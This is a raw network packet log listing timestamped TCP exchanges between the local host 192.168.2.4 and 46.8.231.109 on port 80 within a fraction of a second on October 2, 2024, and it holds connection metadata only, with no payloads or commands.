Oct 2, 2024 09:41:26.465989113 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.465990067 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.466027975 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.466037989 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.466043949 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.466077089 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.466077089 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.466113091 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.466124058 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.466134071 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.466145039 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.466155052 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.466166973 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.466195107 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.466195107 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.466195107 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.466233015 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.466487885 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.466499090 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.466536999 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.551752090 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.551820993 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.551856995 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.551907063 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.551942110 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.551974058 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.552023888 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.552054882 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.552063942 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.552063942 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.552063942 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.552063942 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.552063942 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.552064896 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.552088022 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.552119970 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.552167892 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.552200079 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.552232027 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.552282095 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.552314043 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.552323103 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.552323103 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.552323103 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.552324057 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.552324057 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.552324057 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.552345037 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.552376986 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.552426100 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.552459002 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.552490950 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.552522898 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.552553892 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.552586079 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.552617073 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.552649021 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.552680016 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.552687883 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.552687883 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.552687883 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.552687883 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.552687883 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.552687883 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.552712917 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.552747011 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.552784920 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.552822113 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.552855015 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.552903891 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.552953005 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.552983999 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.553015947 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.553064108 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.553102016 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.553102016 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.553102016 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.553102970 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.553102970 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.553102970 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.553113937 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.553145885 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.553194046 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.553225040 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.553273916 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.553304911 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.553353071 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.553384066 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.553416967 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.553463936 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.553497076 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.553530931 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.553564072 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.553575993 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.553575993 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.553575993 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.553575993 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.553575993 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.553575993 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.553602934 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.553634882 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.553666115 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.553699017 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.553730011 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.553781033 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.553812027 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.553843975 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.553875923 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.553909063 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.553950071 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.553950071 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.553950071 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.553950071 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.553950071 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.553950071 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.553957939 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.553997993 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.554044008 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.554076910 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.554109097 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.554141045 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.554167032 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.554167032 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.554172993 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.554181099 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.554181099 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.554204941 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.554236889 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.554269075 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.554300070 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.554308891 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.554308891 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.554308891 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.554308891 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.554332972 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.554379940 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.554379940 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.554383993 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.554435015 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.554466963 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.554498911 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.554529905 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.554560900 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.554608107 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.554615021 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.554615974 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.554615974 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.554615974 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.554658890 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.554691076 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.554722071 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.554754019 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.554786921 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.554835081 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.554851055 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.554851055 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.554851055 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.554852009 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.554864883 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.554867983 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.554898977 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.554929972 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.554960966 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.554991961 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.555022955 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.555053949 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.555073977 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.555073977 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.555073977 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.555073977 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.555073977 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.555084944 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.555115938 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.555147886 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.555179119 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.555210114 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.555242062 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.555284023 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.555315971 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.555325031 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.555325031 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.555325031 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.555325031 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.555325031 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.555325031 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.555346966 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.555380106 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.555418968 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.555435896 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.555468082 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.555497885 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.555506945 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.555516958 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.555530071 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.555561066 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.555592060 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.555623055 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.555655956 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.555686951 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.555696011 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.555696011 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.555696011 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.555696011 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.555696011 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.555718899 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.555746078 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.555754900 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.555773020 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.555788994 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.556334972 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.556334972 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.640253067 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.640290976 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.640301943 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.640314102 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.640352011 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.640362978 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.640374899 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.640451908 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.640463114 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.640475035 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.640487909 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.640501022 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.640511036 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.640511036 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.640511036 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.640511036 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.640511036 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.640546083 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.640546083 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.640574932 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.640588045 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.640644073 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.640644073 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.640644073 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.640655994 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.640666008 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.640677929 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.640688896 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.640701056 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.640737057 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.640737057 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.640748978 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.640762091 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.640763044 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.640800953 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.640837908 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.640876055 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.640887022 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.640897989 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.640909910 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.640947104 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.640947104 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.640959024 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.640959978 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.640971899 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.640981913 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.641012907 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.641079903 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.641091108 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.641103029 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.641113997 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.641125917 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.641136885 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.641149044 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.641241074 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.641241074 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.641241074 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.641241074 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.641241074 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.641432047 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.641444921 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.641457081 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.641508102 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.641519070 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.641530991 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.641542912 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.641557932 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.641567945 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.641645908 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.641658068 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.641669035 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.641680956 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.641694069 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.641694069 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.641694069 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.641694069 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.641694069 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.641694069 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.641768932 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.641779900 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.641786098 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.641793013 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.641803980 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.641814947 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.641832113 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.641838074 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.641846895 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.641858101 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.641927958 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.641938925 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.641952038 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642016888 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642029047 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642040014 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642085075 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.642085075 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.642085075 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.642085075 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.642085075 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.642085075 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.642158031 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642168999 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642179966 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642191887 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642204046 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642215967 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642226934 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642265081 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642311096 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642323971 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642348051 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.642348051 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.642348051 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.642348051 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.642348051 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.642348051 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:26.642385960 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642398119 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642410040 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642421961 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642462969 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:26.642473936 CEST	80	49749	46.8.231.109	192.168.2.4
